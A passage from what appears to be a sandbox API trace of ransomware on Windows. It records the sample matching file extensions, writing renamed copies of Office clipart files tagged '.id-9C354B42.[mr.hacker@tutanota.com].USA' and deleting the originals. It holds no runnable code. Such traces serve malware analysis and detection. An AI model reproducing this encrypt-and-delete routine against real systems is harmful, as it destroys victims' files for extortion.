Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString=".doc") returned 4 [0273.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString=".docx") returned 5 [0273.001] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.001] lstrlenW (lpString=".pdf") returned 4 [0273.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString=".xls") returned 4 [0273.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.001] lstrlenW (lpString=".xlsx") returned 5 [0273.001] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.001] lstrlenW (lpString=".ppt") returned 4 [0273.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.001] lstrlenW (lpString=".zip") returned 4 [0273.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.001] lstrlenW (lpString=".rar") returned 4 [0273.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.002] lstrlenW (lpString=".bz2") returned 4 [0273.002] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.002] lstrlenW (lpString=".7z") returned 3 [0273.002] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.002] lstrlenW (lpString=".dbf") returned 4 [0273.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.002] lstrlenW (lpString=".1cd") returned 4 [0273.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63 [0273.002] lstrlenW (lpString=".jpg") returned 4 [0273.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.002] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.002] lstrlenW (lpString="HH01065_.WMF") returned 12 [0273.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.002] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=1268) returned 1 [0273.002] CloseHandle (hObject=0x2ac) returned 1 [0273.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf")) returned 0x20 [0273.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.003] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.003] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0273.003] GetLastError () returned 0x0 [0273.003] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x4f4, lpOverlapped=0x0) returned 1 [0273.078] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x500, lpOverlapped=0x0) returned 1 [0273.078] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.078] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.078] SetEndOfFile (hFile=0x398) returned 1 [0273.078] CloseHandle (hObject=0x398) returned 1 [0273.079] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.079] SetEndOfFile (hFile=0x2ac) returned 1 [0273.080] CloseHandle (hObject=0x2ac) returned 1 [0273.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf")) returned 1 [0273.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.120] lstrlenW (lpString=".doc") returned 4 [0273.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.120] lstrlenW (lpString=".docx") returned 5 [0273.120] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.120] lstrlenW (lpString=".pdf") returned 4 [0273.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.120] lstrlenW (lpString=".xls") returned 4 [0273.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.120] lstrlenW (lpString=".xlsx") returned 5 [0273.120] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.120] lstrlenW (lpString=".ppt") returned 4 [0273.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.120] lstrlenW (lpString=".zip") returned 4 [0273.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.121] lstrlenW (lpString=".rar") returned 4 [0273.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString=".bz2") returned 4 [0273.121] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString=".7z") returned 3 [0273.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.121] lstrlenW (lpString=".dbf") returned 4 [0273.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.121] lstrlenW (lpString=".1cd") returned 4 [0273.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.121] lstrlenW (lpString=".jpg") returned 4 [0273.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.121] lstrlenW (lpString=".doc") returned 4 [0273.121] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString=".docx") returned 5 [0273.121] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.121] lstrlenW (lpString=".pdf") returned 4 [0273.121] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString=".xls") returned 4 [0273.121] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.121] lstrlenW (lpString=".xlsx") returned 5 [0273.121] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.121] lstrlenW (lpString=".ppt") returned 4 [0273.121] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.122] lstrlenW (lpString=".zip") returned 4 [0273.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.122] lstrlenW (lpString=".rar") returned 4 [0273.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.122] lstrlenW (lpString=".bz2") returned 4 [0273.122] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.122] lstrlenW (lpString=".7z") returned 3 [0273.122] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.122] lstrlenW (lpString=".dbf") returned 4 [0273.122] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.122] lstrlenW (lpString=".1cd") returned 4 [0273.122] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63 [0273.122] lstrlenW (lpString=".jpg") returned 4 [0273.122] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.122] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.122] lstrlenW (lpString="HH02282_.WMF") returned 12 [0273.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.123] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=7932) returned 1 [0273.123] CloseHandle (hObject=0x2ac) returned 1 [0273.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf")) returned 0x20 [0273.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.123] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.123] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0273.123] GetLastError () returned 0x0 [0273.123] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x1efc, lpOverlapped=0x0) returned 1 [0273.164] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1f00, lpOverlapped=0x0) returned 1 [0273.165] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.165] WriteFile (in: hFile=0x398, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.165] SetEndOfFile (hFile=0x398) returned 1 [0273.165] CloseHandle (hObject=0x398) returned 1 [0273.165] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.165] SetEndOfFile (hFile=0x2ac) returned 1 [0273.167] CloseHandle (hObject=0x2ac) returned 1 [0273.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.172] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf")) returned 1 [0273.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.202] lstrlenW (lpString=".doc") returned 4 [0273.202] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.205] lstrlenW (lpString=".docx") returned 5 [0273.205] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.212] lstrlenW (lpString=".pdf") returned 4 [0273.212] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.212] lstrlenW (lpString=".xls") returned 4 [0273.213] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.213] lstrlenW (lpString=".xlsx") returned 5 [0273.213] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.213] lstrlenW (lpString=".ppt") returned 4 [0273.213] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString=".zip") returned 4 [0273.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.213] lstrlenW (lpString=".rar") returned 4 [0273.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString=".bz2") returned 4 [0273.213] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString=".7z") returned 3 [0273.213] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString=".dbf") returned 4 [0273.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString=".1cd") returned 4 [0273.213] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString=".jpg") returned 4 [0273.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.213] lstrlenW (lpString=".doc") returned 4 [0273.213] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.213] lstrlenW (lpString=".docx") returned 5 [0273.213] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.214] lstrlenW (lpString=".pdf") returned 4 [0273.214] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString=".xls") returned 4 [0273.214] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.214] lstrlenW (lpString=".xlsx") returned 5 [0273.214] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.214] lstrlenW (lpString=".ppt") returned 4 [0273.214] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.214] lstrlenW (lpString=".zip") returned 4 [0273.214] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.214] lstrlenW (lpString=".rar") returned 4 [0273.214] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString=".bz2") returned 4 [0273.214] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString=".7z") returned 3 [0273.214] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.214] lstrlenW (lpString=".dbf") returned 4 [0273.214] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.214] lstrlenW (lpString=".1cd") returned 4 [0273.214] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63 [0273.214] lstrlenW (lpString=".jpg") returned 4 [0273.214] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.214] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.214] lstrlenW (lpString="HM00172_.WMF") returned 12 [0273.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.215] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2832) returned 1 [0273.215] CloseHandle (hObject=0x2ac) returned 1 [0273.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf")) returned 0x20 [0273.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.215] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.215] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.216] GetLastError () returned 0x0 [0273.216] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xb10, lpOverlapped=0x0) returned 1 [0273.225] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xb20, lpOverlapped=0x0) returned 1 [0273.226] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.226] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.226] SetEndOfFile (hFile=0x2b0) returned 1 [0273.226] CloseHandle (hObject=0x2b0) returned 1 [0273.226] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.226] SetEndOfFile (hFile=0x2ac) returned 1 [0273.228] CloseHandle (hObject=0x2ac) returned 1 [0273.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf")) returned 1 [0273.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.228] lstrlenW (lpString=".doc") returned 4 [0273.228] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.228] lstrlenW (lpString=".docx") returned 5 [0273.228] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.228] lstrlenW (lpString=".pdf") returned 4 [0273.228] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.228] lstrlenW (lpString=".xls") returned 4 [0273.228] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.228] lstrlenW (lpString=".xlsx") returned 5 [0273.228] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.229] lstrlenW (lpString=".ppt") returned 4 [0273.229] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString=".zip") returned 4 [0273.229] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.229] lstrlenW (lpString=".rar") returned 4 [0273.229] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString=".bz2") returned 4 [0273.229] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString=".7z") returned 3 [0273.229] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString=".dbf") returned 4 [0273.229] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString=".1cd") returned 4 [0273.229] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString=".jpg") returned 4 [0273.229] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.229] lstrlenW (lpString=".doc") returned 4 [0273.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString=".docx") returned 5 [0273.229] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.229] lstrlenW (lpString=".pdf") returned 4 [0273.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.229] lstrlenW (lpString=".xls") returned 4 [0273.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.230] lstrlenW (lpString=".xlsx") returned 5 [0273.230] 